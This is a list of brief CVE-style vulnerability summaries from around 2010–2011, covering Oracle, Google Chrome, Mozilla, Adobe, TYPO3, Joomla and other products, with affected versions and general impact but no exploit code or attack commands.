Unspecified vulnerability in the Security Framework component in Oracle Database Server 10.1.0.5, 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.1, and 11.2.0.2; and Oracle Enterprise Manager Grid Control 10.1.0.6 and 10.2.0.5; allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to User Model.
Unspecified vulnerability in the OpenSSO Enterprise and Sun Java System Access Manager components in Oracle Sun Products Suite 7.1 and 8.0 allows remote authenticated users to affect confidentiality via unknown vectors related to Authentication.
Unspecified vulnerability in the Oracle Sun Java System Access Manager Policy Agent 2.2 allows remote attackers to affect availability via unknown vectors related to Web Proxy Agent.
Unspecified vulnerability in the Database Control component in Oracle Enterprise Manager Grid Control 10.1.0.6 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the OpenSSO Enterprise and Sun Java System Access Manager components in Oracle Sun Products Suite 7.1 and 8.0 allows remote attackers to affect integrity via unknown vectors related to Authentication.
Unspecified vulnerability in the Siebel CRM Core component in Oracle Siebel CRM 7.8.2, 8.0.0, and 8.1.1 allows remote attackers to affect integrity via unknown vectors related to Globalization - Automotive.
Unspecified vulnerability in Oracle PeopleSoft Enterprise PeopleTools 8.49 GA through 8.49.30 allows remote authenticated users to affect confidentiality via unknown vectors related to File Processing.
Unspecified vulnerability in the Core RDBMS component in Oracle Database Server 11.1.0.7, 11.2.0.1, and 11.2.0.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to create procedure privileges.
Unspecified vulnerability in the Agile Technology Platform component in Oracle Supply Chain Products Suite 9.3.0.2 and 9.3.1 allows remote attackers to affect confidentiality via unknown vectors related to Security.
Unspecified vulnerability in the Core RDBMS component in Oracle Database Server 11.1.0.7, 11.2.0.1, and 11.2.0.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2011-0832 and CVE-2011-0880.
Unspecified vulnerability in the Siebel CRM Core component in Oracle Siebel CRM 8.0.0 and 8.1.1 allows remote attackers to affect integrity via unknown vectors related to Globalization - Automotive.
Unspecified vulnerability in the Core RDBMS component in Oracle Database Server 11.1.0.7, 11.2.0.1, and 11.2.0.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2011-0835 and CVE-2011-0880.
Unspecified vulnerability in the Enterprise Config Management component in Oracle Database Server 10.1.0.5, 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.1, and 11.2.0.2; and Oracle Enterprise Manager Grid Control 10.1.0.6 and 10.2.0.5; allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Event Management component in Oracle Database Server 10.1.0.5, 10.2.0.3, and 10.2.0.4, and Oracle Enterprise Manager Grid Control 10.1.0.6, allows remote attackers to affect integrity via unknown vectors related to Rules Management UI.
Unspecified vulnerability in Oracle PeopleSoft Enterprise 8.8 Bundle #13 allows remote attackers to affect integrity via unknown vectors related to Application Portal.
Unspecified vulnerability in the PeopleSoft Enterprise component in Oracle PeopleSoft Products 8.50 GA through 8.50.17 and 8.51 GA through 8.51.07 allows remote authenticated users to affect integrity via unknown vectors related to PeopleTools.
Unspecified vulnerability in Oracle PeopleSoft Enterprise 8.8 Bundle #13, 8.9 Bundle #7, 9.0 Bundle #7, and 9.1 Bundle #4 allows remote authenticated users to affect integrity via unknown vectors related to Application Portal.
Unspecified vulnerability in the Streams, AQ &amp; Replication Mgmt component in Oracle Database Server 10.1.0.5 and 10.2.0.3, and Oracle Enterprise Manager Grid Control 10.1.0.6, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in Oracle Solaris 8, 9, and 10 allows local users to affect confidentiality and integrity via unknown vectors related to uucp.
Unspecified vulnerability in Oracle Solaris 10, and 11 Express allows remote attackers to affect availability via unknown vectors related to Kernel.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, when running on Windows, allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deployment.
Unspecified vulnerability in the CMDB Metadata &amp; Instance APIs component in Oracle Database Server 10.1.0.5, 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.1, and 11.2.0.2; and Oracle Enterprise Manager Grid Control 10.1.0.6 and 10.2.0.5; allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, 5.0 Update 29 and earlier, and 1.4.2_31 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to AWT.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, 5.0 Update 29 and earlier, and 1.4.2_31 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Sound, a different vulnerability than CVE-2011-0802.
Unspecified vulnerability in Oracle Solaris 8, 9, 10, and 11 Express allows local users to affect availability via unknown vectors related to Kernel, a different vulnerability than CVE-2012-0098.
Unspecified vulnerability in the Solaris component in Oracle Solaris 8, 9, 10, and 11 Express allows local users to affect availability via unknown vectors related to Kernel.
Unspecified vulnerability in the Enterprise Config Management component in Oracle Database Server 10.1.0.5, 10.2.0.3, and 10.2.0.4, and Oracle Enterprise Manager Grid Control 10.1.0.6 and 10.2.0.5, allows local users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Web ADI component in Oracle E-Business Suite 11.5.10.2, 12.0.6, 12.1.1, 12.1.2, and 12.1.3 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.3.2.0 and 8.3.5.0 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Outside In Filters.  NOTE: the previous information was obtained from the April 2011 CPU. Oracle has not commented on claims from a reliable third party that this issue is in (a) vswk6.dll or (b) libvs_wk6.so in Outside In 8.1.0.4037 through 8.3.5.5684, involving the Lotus 123 parser.
Unspecified vulnerability in Oracle Sun GlassFish Enterprise Server 2.1, 2.1.1, and 3.0.1, and Sun Java System Application Server 9.1, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Administration.
Unspecified vulnerability in the Network Foundation component in Oracle Database Server 10.1.0.5, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.1, and 11.2.0.2, when running on Windows, allows remote attackers to affect availability via unknown vectors.
Unspecified vulnerability in the UIX component in Oracle Database Server 10.1.0.5, 10.2.0.4, 11.1.0.7, and 11.2.0.1 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Database Vault component in Oracle Database Server 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.1, and 11.2.0.2 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, 5.0 Update 29 and earlier, and 1.4.2_31 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Sound, a different vulnerability than CVE-2011-0814.
Unspecified vulnerability in Oracle Solaris 10 and 11 Express allows local users to affect confidentiality and integrity via unknown vectors related to cp.
Unspecified vulnerability in the Solaris component in Oracle Solaris 8, 9, 10, and 11 Express allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Administration Utilities.
Unspecified vulnerability in the Oracle Warehouse Builder component in Oracle Database Server 10.2.0.5 (OWB), 11.1.0.7, and 11.2.0.1 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Oracle Warehouse Builder User Account.
Unspecified vulnerability in the Portal component in Oracle Fusion Middleware 10.1.2.3 and 11.1.1.2.0 allows remote attackers to affect integrity via unknown vectors related to Midtier Infrastructure.
Unspecified vulnerability in the Applications Install component in Oracle E-Business Suite 11.5.10.2, 12.0.6, 12.1.1, 12.1.2, and 12.1.3 allows remote authenticated users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Applications Install component in Oracle E-Business Suite 11.5.10.2, 12.0.6, 12.1.1, 12.1.2, and 12.1.3 allows local users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Single Sign On component in Oracle Fusion Middleware 10.1.2.3 allows remote authenticated users to affect integrity via unknown vectors related to Administration and Monitoring.
Unspecified vulnerability in the Oracle Warehouse Builder component in Oracle Database Server 10.2.0.5 (OWB) and 11.1.0.7 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Dimensional Data Modeling.
Unspecified vulnerability in the Application Object Library component in Oracle E-Business Suite 11.5.10.2, 12.0.6, 12.1.1, 12.1.2, and 12.1.3 allows remote attackers to affect confidentiality via unknown vectors related to Data Export.
Unspecified vulnerability in Oracle Solaris 9 and 10 allows local users to affect confidentiality via unknown vectors related to wbem.
Unspecified vulnerability in the Oracle HTTP Server component in Oracle Fusion Middleware 10.1.2.3 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, when running on Windows, allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2011-0786.
Unspecified vulnerability in the Application Service Level Management component in Oracle Database Server 11.1.0.7 and Enterprise Manager Grid Control allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Service Level Agreements.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, when running on Windows, allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2011-0788.
Unspecified vulnerability in the Oracle Help component in Oracle Database Server 11.1.0.7, 11.2.0.1, 11.2.0.2, 10.1.0.5, 10.2.0.3, 10.2.0.4, 10.2.0.5, and 10.1.0.5; and Oracle Fusion Middleware 11.1.1.2.0, 11.1.1.3.0, and 11.1.1.4.0 allows remote attackers to affect integrity via unknown vectors.
Google Chrome before 9.0.597.84 on Mac OS X does not properly mitigate an unspecified flaw in the Mac OS X 10.5 SSL libraries, which allows remote attackers to cause a denial of service (application crash) via unknown vectors.
The PDF event handler in Google Chrome before 9.0.597.84 does not properly interact with print operations, which allows user-assisted remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via unknown vectors.
pivotx/modules/module_image.php in PivotX 2.2.2 allows remote attackers to obtain sensitive information via a non-existent file in the image parameter, which reveals the installation path in an error message.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in IBM Tivoli Integrated Portal (TIP) 1.1.1.1, as used in IBM Tivoli Common Reporting (TCR) 1.2.0 before Interim Fix 9, have unknown impact and attack vectors, related to "security vulnerabilities of Websphere Application Server bundled within" and "many internal defects and APARs."
Unspecified vulnerability in Plone 2.5 through 4.0, as used in Conga, luci, and possibly other products, allows remote attackers to obtain administrative access, read or create arbitrary content, and change the site skin via unknown vectors.
The JNLPClassLoader class in IcedTea-Web before 1.0.1, as used in OpenJDK Runtime Environment 1.6.0, allows remote attackers to gain privileges via unknown vectors related to multiple signers and the assignment of "an inappropriate security descriptor."
Unspecified vulnerability in Opera before 11.01 allows remote attackers to cause a denial of service (application crash) via unknown content on a web page, as demonstrated by vkontakte.ru.
Opera before 11.01 does not properly handle redirections and unspecified other HTTP responses, which allows remote web servers to obtain sufficient access to local files to use these files as page resources, and consequently obtain potentially sensitive information from the contents of the files, via an unknown response manipulation.
Multiple unspecified vulnerabilities in TIBCO Rendezvous 8.2.1 through 8.3.0, Enterprise Message Service (EMS) 5.1.0 through 6.0.0, Runtime Agent (TRA) 5.6.2 through 5.7.0, Silver BPM Service before 1.0.4, Silver CAP Service vebefore 1.0.2, and Silver BusinessWorks Service 1.0.0, when running on Unix systems, allow local users to gain root privileges via unknown vectors related to SUID and (1) Rendezvous Routing Daemon (rvrd), (2) Rendezvous Secure Daemon (rvsd), (3) Rendezvous Secure Routing Daemon (rvsrd), and (4) EMS Server (tibemsd).
Unspecified vulnerability in EMC Avamar before 5.0.4-30 allows remote authenticated users to gain privileges via unknown vectors.
Multiple cross-site scripting (XSS) vulnerabilities in wp-admin/admin.php in the StatPressCN plugin 1.9.0 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) what1, (2) what2, (3) what3, (4) what4, and (5) what5 parameters. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site request forgery (CSRF) vulnerability in Adobe ColdFusion 8.0, 8.0.1, 9.0, and 9.0.1 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X do not properly validate unspecified input data, which allows attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2011-0565.
Unspecified vulnerability in the administrator console in Adobe ColdFusion 8.0 through 9.0.1 allows attackers to obtain sensitive information via unknown vectors.
Unspecified vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Mac OS X allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors.
Unspecified vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2011-0585.
Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows use weak permissions for unspecified files, which allows attackers to gain privileges via unknown vectors.
Cross-site scripting (XSS) vulnerability in Vaadin before 6.4.9 allows remote attackers to inject arbitrary web script or HTML via unknown vectors related to the index page.
Buffer overflow in VideoSpirit Pro 1.6.8.1 and possibly earlier versions, and VideoSpirit Lite 1.4.0.1 and possibly other versions, allows user-assisted remote attackers to execute arbitrary code via a VideoSpirit project (.visprj) file containing a valitem element with a long "name" attribute.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Google Chrome before 8.0.552.237 and Chrome OS before 8.0.552.344 do not properly perform DOM node removal, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to a "stale rendering node."
Google Chrome before 8.0.552.237 and Chrome OS before 8.0.552.344 do not properly perform a cast of an unspecified variable during handling of video, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Google Chrome before 8.0.552.237 and Chrome OS before 8.0.552.344 do not properly handle SVG use elements, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to a "stale pointer."
Google Chrome before 8.0.552.237 and Chrome OS before 8.0.552.344 do not properly handle a mismatch in video frame sizes, which allows remote attackers to cause a denial of service (incorrect memory access) or possibly have unspecified other impact via unknown vectors.
Google Chrome before 8.0.552.237 and Chrome OS before 8.0.552.344 do not properly handle Cascading Style Sheets (CSS) token sequences in conjunction with cursors, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to a "stale pointer."
Google Chrome before 8.0.552.237 and Chrome OS before 8.0.552.344 do not properly handle Cascading Style Sheets (CSS) token sequences in conjunction with CANVAS elements, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to a "stale pointer."
The node-iteration implementation in Google Chrome before 8.0.552.237 and Chrome OS before 8.0.552.344 does not properly handle pointers, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Unspecified vulnerability in Novell Vibe OnPrem 3.0 before Hot Patch 1 allows remote attackers to execute arbitrary code via unknown vectors.
The afs_linux_lock function in afs/LINUX/osi_vnodeops.c in the kernel module in OpenAFS 1.4.14, 1.4.12, 1.4.7, and possibly other versions does not properly handle errors, which allows attackers to cause a denial of service via unknown vectors.  NOTE: some of these details are obtained from third party information.
Double free vulnerability in the Rx server process in OpenAFS 1.4.14, 1.4.12, 1.4.7, and possibly other versions allows remote attackers to cause a denial of service and execute arbitrary code via unknown vectors.
Unspecified vulnerability in EMC RSA Access Manager Server 5.5.x, 6.0.x, and 6.1.x allows remote attackers to access resources via unknown vectors.
Unspecified vulnerability in the BlackBerry Administration API in Research In Motion (RIM) BlackBerry Enterprise Server (BES) software 5.0.1 through 5.0.3, and BlackBerry Enterprise Server Express software 5.0.1 through 5.0.3, allows remote attackers to read text files or cause a denial of service via unknown vectors.
Unspecified vulnerability in HP Web Jetadmin 10.2 Service Release 3 and 4 allows local users to bypass intended access restrictions via unknown vectors.
Unspecified vulnerability in HP OpenView Storage Data Protector 6.0, 6.10, and 6.11 allows remote attackers to cause a denial of service via unknown vectors.
Unspecified vulnerability in the browser engine in Mozilla Firefox 3.6.x before 3.6.17 and 4.x before 4.0.1, and Thunderbird 3.1.x before 3.1.10, allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox 3.5.x before 3.5.19 and 3.6.x before 3.6.17, Thunderbird before 3.1.10, and SeaMonkey before 2.0.14 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox 4.x before 4.0.1 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via vectors related to gfx/layers/d3d10/ReadbackManagerD3D10.cpp and unknown other vectors.
Unspecified vulnerability in the browser engine in Mozilla Firefox 3.5.x before 3.5.19 and 3.6.x before 3.6.17, Thunderbird before 3.1.10, and SeaMonkey before 2.0.14 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2011-0072, CVE-2011-0074, CVE-2011-0075, and CVE-2011-0077.
Unspecified vulnerability in the browser engine in Mozilla Firefox 3.5.x before 3.5.19 and 3.6.x before 3.6.17, Thunderbird before 3.1.10, and SeaMonkey before 2.0.14 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2011-0072, CVE-2011-0074, CVE-2011-0075, and CVE-2011-0078.
Unspecified vulnerability in the Java Embedding Plugin (JEP) in Mozilla Firefox before 3.5.19 and 3.6.x before 3.6.17, and SeaMonkey before 2.0.14, on Mac OS X allows remote attackers to bypass intended access restrictions via unknown vectors.
Unspecified vulnerability in the browser engine in Mozilla Firefox 3.5.x before 3.5.19 and 3.6.x before 3.6.17, Thunderbird before 3.1.10, and SeaMonkey before 2.0.14 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2011-0072, CVE-2011-0074, CVE-2011-0077, and CVE-2011-0078.
Unspecified vulnerability in the browser engine in Mozilla Firefox 3.5.x before 3.5.19 and 3.6.x before 3.6.17, Thunderbird before 3.1.10, and SeaMonkey before 2.0.14 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2011-0072, CVE-2011-0075, CVE-2011-0077, and CVE-2011-0078.
Unspecified vulnerability in the browser engine in Mozilla Firefox 3.5.x before 3.5.19 and 3.6.x before 3.6.17, Thunderbird before 3.1.10, and SeaMonkey before 2.0.14 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2011-0074, CVE-2011-0075, CVE-2011-0077, and CVE-2011-0078.
Unspecified vulnerability in the browser engine in Mozilla Firefox 3.5.x before 3.5.19, 3.6.x before 3.6.17, and 4.x before 4.0.1; Thunderbird before 3.1.10; and SeaMonkey before 2.0.14 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2011-0069.
Unspecified vulnerability in the browser engine in Mozilla Firefox 3.5.x before 3.5.19, 3.6.x before 3.6.17, and 4.x before 4.0.1; Thunderbird before 3.1.10; and SeaMonkey before 2.0.14 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2011-0070.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox 3.6.x before 3.6.14 and Thunderbird 3.1.x before 3.1.8 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 3.5.17 and 3.6.x before 3.6.14, Thunderbird before 3.1.8, and SeaMonkey before 2.0.12 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Double free vulnerability in the iscsi_rx_handler function (usr/iscsi/iscsid.c) in the tgt daemon (tgtd) in Linux SCSI target framework (tgt) before 1.0.14, aka scsi-target-utils, allows remote attackers to cause a denial of service (memory corruption and crash) and possibly execute arbitrary code via unknown vectors related to a buffer overflow during iscsi login. NOTE: some of these details are obtained from third party information.
Multiple untrusted search path vulnerabilities in libmcl-5.4.0.dll in Gromada Multimedia Conversion Library 5.4.0 allow local users to gain privileges via a Trojan horse (1) libgif-1.1.0.dll or (2) libhav-1.0.1.dll file in the current working directory.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple untrusted search path vulnerabilities in IsoBuster 2.8 allow local users to gain privileges via a Trojan horse (1) wnaspi32.dll or (2) ntaspi32.dll file in the current working directory, as demonstrated by a directory that contains a .img file.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple untrusted search path vulnerabilities in IBM Lotus Notes 8.5 allow local users to gain privileges via a Trojan horse (1) nnoteswc.dll or (2) nlsxbe.dll file in the current working directory, as demonstrated by a directory that contains a .vcf, .vcs, or .ics file.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Untrusted search path vulnerability in Sophos Free Encryption 2.40.1.1 and Sophos SafeGuard PrivateCrypto 2.40.1.2 allows local users to gain privileges via a Trojan horse pcrypt0406.dll file in the current working directory, as demonstrated by a directory that contains a .uti file.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple untrusted search path vulnerabilities in Maxthon Browser 1.6.7.35 and 2.5.15 allow local users to gain privileges via a Trojan horse (1) RSRC32.dll or (2) dwmapi.dll file in the current working directory, as demonstrated by a directory that contains a .html file. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple untrusted search path vulnerabilities in Autodesk AutoCAD 2010 allow local users to gain privileges via a Trojan horse (1) dwmapi.dll or (2) IBFS32.DLL file in the current working directory, as demonstrated by a directory that contains a .dwg file.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple untrusted search path vulnerabilities in Camtasia Studio 7.0.1 build 57 allow local users to gain privileges via a Trojan horse (1) MFC90ENU.DLL or (2) MFC90LOC.DLL file in the current working directory, as demonstrated by a directory that contains a .cmmp or .camrec file.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Untrusted search path vulnerability in DivX Plus Player 8.1.0 allows local users to gain privileges via a Trojan horse ssleay32.dll file in a certain directory.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Untrusted search path vulnerability in DivX Player 7.2.019 allows local users to gain privileges via a Trojan horse VersionCheckDLL.dll file in the current working directory, as demonstrated by a directory that contains a .avi file.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple untrusted search path vulnerabilities in Autodesk Design Review 2011 11.0.0.86 allow local users to gain privileges via a Trojan horse (1) dwmapi.dll, (2) whiptk_wt.7.12.601.dll, or (3) xaml_wt.7.6.0.dll file in the current working directory, as demonstrated by a directory that contains a .dwf file.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Untrusted search path vulnerability in Ease Jukebox 1.40 allows local users to gain privileges via a Trojan horse wmaudsdk.dll file in the current working directory, as demonstrated by a directory that contains a .mp3 or .wav file.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple untrusted search path vulnerabilities in TuneUp Utilities 2009 8.0.3310 and 2010 9.0.4600 allow local users to gain privileges via a Trojan horse (1) wscapi.dll or (2) vclib32.dll file in the current working directory, as demonstrated by a directory that contains a .tvs file.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Untrusted search path vulnerability in LINGO 11.0.1.6 and 12.0.2.20 allows local users to gain privileges via a Trojan horse myuser.dll file in the current working directory, as demonstrated by a directory that contains a .ltf file.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Untrusted search path vulnerability in Adobe LiveCycle Designer ES2 9.0.0.20091029.1.612548 allows local users to gain privileges via a Trojan horse objectassisten_US.dll file in the current working directory, as demonstrated by a directory that contains a .tds file. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Untrusted search path vulnerability in PhotoImpact X3 13.00.0000.0 allows local users to gain privileges via a Trojan horse bwsconst.dll file in the current working directory, as demonstrated by a directory that contains a .ufp or .ufo file.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
The Antivirus component in Comodo Internet Security before 5.3.174622.1216 does not check whether X.509 certificates in signed executable files have been revoked, which has unknown impact and remote attack vectors.
SQL injection vulnerability in detResolucion.php in CMS Ariadna 1.1 allows remote attackers to execute arbitrary SQL commands via the res_id parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in jsp/admin/tools/remote_share.jsp in ManageEngine ADManager Plus 4.4.0 allows remote attackers to inject arbitrary web script or HTML via the computerName parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in members/profileCommentsResponse.php in Rayzz Photoz allows remote attackers to inject arbitrary web script or HTML via the profileCommentTextArea parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in the search feature in Campsite 3.4.0 allows remote attackers to inject arbitrary web script or HTML via the f_search_keywords parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the Webkit PDFs (webkitpdf) extension before 1.1.4 for TYPO3 allows remote attackers to execute arbitrary commands via unknown vectors.
Unspecified vulnerability in the JW Calendar (jw_calendar) extension 1.3.20 and earlier for TYPO3 allows remote attackers to execute arbitrary code via unknown vectors.
SQL injection vulnerability in the Weblinks (com_weblinks) component in Joomla! allows remote attackers to execute arbitrary SQL commands via the Itemid parameter in a categories action to index.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the Tiny Market (hm_tinymarket) extension 0.5.4 and earlier for TYPO3 allows attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in SmartFTP before 4.0 Build 1142 allows attackers to have an unknown impact via a long filename.
Unspecified vulnerability in Hitachi EUR Form Client before 05-10 -/D 2010.11.15 and 05-10-CA (* 2) 2010.11.15; Hitachi EUR Form Service before 05-10 -/D 2010.11.15; and uCosminexus EUR Form Service before 07-60 -/D 2010.11.15 on Windows, before 05-10 -/D 2010.11.15 and 07-50 -/D 2010.11.15 on Linux, and before 07-50 -/C 2010.11.15 on AIX; allows remote attackers to execute arbitrary code via unknown attack vectors.
SQL injection vulnerability in LightNEasy.php in LightNEasy 3.2.1, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the page parameter, a different vector than CVE-2008-6593, CVE-2010-3484, and CVE-2010-3485.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in abcm2ps before 5.9.13 have unknown impact and attack vectors, a different issue than CVE-2010-3441.
Unspecified vulnerability in the math plugin in Smarty before 3.0.0 RC1 has unknown impact and remote attack vectors.  NOTE: this might overlap CVE-2009-1669.
Multiple unspecified vulnerabilities in the parser implementation in Smarty before 3.0.0 RC3 have unknown impact and remote attack vectors.
Unspecified vulnerability in the fetch plugin in Smarty before 3.0.2 has unknown impact and remote attack vectors.
SQL injection vulnerability in default.asp in HotWebScripts HotWeb Rentals allows remote attackers to execute arbitrary SQL commands via the PageId parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
The iconv_mime_decode_headers function in the Iconv extension in PHP before 5.3.4 does not properly handle encodings that are unrecognized by the iconv and mbstring (aka Multibyte String) implementations, which allows remote attackers to trigger an incomplete output array, and possibly bypass spam detection or have unspecified other impact, via a crafted Subject header in an e-mail message, as demonstrated by the ks_c_5601-1987 character set.
Multiple SQL injection vulnerabilities in Joomla! 1.5.x before 1.5.22 allow remote attackers to execute arbitrary SQL commands via the (1) filter_order or (2) filter_order_Dir parameter in a com_contact action to index.php, a different vulnerability than CVE-2010-4166.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the News module in CMS Made Simple (CMSMS) before 1.9.1 has unknown impact and attack vectors.
Multiple cross-site scripting (XSS) vulnerabilities in XWiki Watch 1.0 allow remote attackers to inject arbitrary web script or HTML via the rev parameter to (1) bin/viewrev/Main/WebHome and (2) bin/view/Blog, and the (3) register_first_name and (4) register_last_name parameters to bin/register/XWiki/Register.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site request forgery (CSRF) vulnerability in usercp2.php in MyBB (aka MyBulletinBoard) before 1.4.12 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in the Space Management client in the Hierarchical Storage Management (HSM) component in IBM Tivoli Storage Manager (TSM) 5.4.x before 5.4.3.4, 5.5.x before 5.5.3, 6.1.x before 6.1.4, and 6.2.x before 6.2.2 on Unix and Linux allows remote attackers to execute arbitrary commands via unknown vectors, related to a "script execution vulnerability."
